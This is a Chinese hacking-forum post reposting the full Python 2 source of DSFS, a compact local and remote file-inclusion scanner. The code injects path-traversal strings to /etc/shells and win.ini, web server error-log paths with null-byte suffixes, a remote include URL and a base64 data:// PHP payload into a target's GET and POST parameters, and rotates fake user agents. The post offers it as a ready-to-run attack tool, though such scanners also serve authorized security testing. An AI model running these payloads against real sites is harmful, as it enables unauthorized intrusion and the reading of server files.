搜索
查看: 231|回复: 0

【100行Python代码扫描器】 LFI/RFI vulnerability scanner (DSFS)

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-12-2 21:12:03 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/env python
  2. import itertools, optparse, random, re, urllib, urllib2

  3. NAME    = "Damn Small FI Scanner (DSFS) < 100 LoC (Lines of Code)"
  4. VERSION = "0.1c"
  5. AUTHOR  = "Miroslav Stampar (@stamparm)"
  6. LICENSE = "Public domain (FREE)"

  7. DYNAMIC_CONTENT_VALUE = "Legal disclaimer:"                                                                 # string value to search if the content is dynamically evaluated
  8. DYNAMIC_CONTENT = "<?php echo base64_decode('%s');?>" % DYNAMIC_CONTENT_VALUE.encode("base64").strip()      # used dynamic content
  9. COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"                                                     # optional HTTP header names
  10. GET, POST = "GET", "POST"                                                                                   # enumerator-like values used for marking current phase
  11. TIMEOUT = 30                                                                                                # connection timeout in seconds

  12. ERROR_REGEX = r"(?i)(Fatal error|Warning)(</b>)?:\s+((require|include)(_once)?|file_get_contents)\(\)"      # regular expression used for detection of vulnerability specific PHP error messages

  13. FI_TESTS = (                                                                                                # each (test) item consists of ("filepath", "content recognition regex", (combining "prefixes"), (combining "suffixes"), 'inclusion type')
  14.     ("", r"\[[^\]]+\]\s+\[(warn|notice|error)\]\s+\[client", ("/xampp/apache/logs/", "/apache/logs/", "/wamp/apache2/logs/", "/wamp/logs/", "/program files/wamp/apache2/logs/", "/program files/apache group/apache/logs/", "/var/log/apache/", "/var/log/apache2/", "/var/log/httpd/", "/var/log/nginx/", "/opt/lampp/logs/", "/opt/xampp/logs/"), ("error.log", "error.log%00"), 'L'),
  15.     ("https://raw.githubusercontent.com/stamparm/DSFS/master/files/", "Usage of Damn Small FI Scanner", ("",), ("", "%00", "config", "config.php", "config.php%00", "config.jpg", "config.jpg%00"), 'R'),
  16.     ("/etc/shells", "valid login shells", ("../../../../../../..", ""), ("", "%00"), 'L'),
  17.     ("/windows/win.ini", "for 16-bit app support", ("../../../../../../..", ""), ("", "%00"), 'L'),
  18.     ("data://text/plain;base64,%s" % DYNAMIC_CONTENT.encode("base64").strip(), ("<?php echo base64_decode\(|%s" % DYNAMIC_CONTENT_VALUE), ("", ), ("", ), 'S'),
  19. )

  20. USER_AGENTS = (                                                                                             # items used for picking random HTTP User-Agent header value
  21.     "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21",
  22.     "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
  23.     "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20020508 Netscape6/6.1",
  24.     "Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5",
  25.     "Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10"
  26. )

  27. _headers = {}                                                                                               # used for storing dictionary with optional header values

  28. def _retrieve_content(url, data=None, method=None):
  29.     try:
  30.         req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, _headers)
  31.         req.get_method = lambda: method or (POST if data else GET)
  32.         retval = urllib2.urlopen(req, timeout=TIMEOUT).read()
  33.     except Exception, ex:
  34.         retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())
  35.     return retval or ""

  36. def scan_page(url, data=None):
  37.     retval, usable = False, False
  38.     _retrieve_content(url, method=DYNAMIC_CONTENT)                                                          # dummy errorneous request
  39.     try:
  40.         for phase in (GET, POST):
  41.             current = url if phase is GET else (data or "")
  42.             for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)(?P<value>[^&]*)", current):
  43.                 warned, found, usable = False, False, True
  44.                 print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
  45.                 for filepath, regex, prefixes, suffixes, inc_type in FI_TESTS:
  46.                     for prefix, suffix in itertools.product(prefixes, suffixes):
  47.                         tampered = current.replace(match.group(0), "%s%s" % (match.group(1), urllib.quote("%s%s%s" % (prefix, filepath, suffix), safe='%')))
  48.                         content = (_retrieve_content(tampered, data) if phase is GET else _retrieve_content(url, tampered))
  49.                         if re.search(regex, content):
  50.                             print " (i) %s parameter '%s' appears to be (%s)FI vulnerable (e.g.: '%s')" % (phase, match.group("parameter"), inc_type, tampered)
  51.                             if DYNAMIC_CONTENT_VALUE in content:
  52.                                 print "  (!) content seems to be dynamically evaluated"
  53.                             found = retval = True
  54.                             break
  55.                         if not found and not warned and re.search(ERROR_REGEX, content, re.I):
  56.                             print " (i) %s parameter '%s' could be FI vulnerable" % (phase, match.group("parameter"))
  57.                             warned = True
  58.         if not usable:
  59.             print " (x) no usable GET/POST parameters found"
  60.     except KeyboardInterrupt:
  61.         print "\r (x) Ctrl-C pressed"
  62.     return retval

  63. def init_options(proxy=None, cookie=None, ua=None, referer=None):
  64.     global _headers
  65.     _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
  66.     urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

  67. if __name__ == "__main__":
  68.     print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
  69.     parser = optparse.OptionParser(version=VERSION)
  70.     parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. "http://www.target.com/page.php?id=1")")
  71.     parser.add_option("--data", dest="data", help="POST data (e.g. "query=test")")
  72.     parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
  73.     parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
  74.     parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value")
  75.     parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
  76.     parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. "http://127.0.0.1:8080")")
  77.     options, _ = parser.parse_args()
  78.     if options.url:
  79.         init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer)
  80.         result = scan_page(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
  81.         print "\nscan results: %s vulnerabilities found" % ("possible" if result else "no")
  82.     else:
  83.         parser.print_help()
复制代码
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表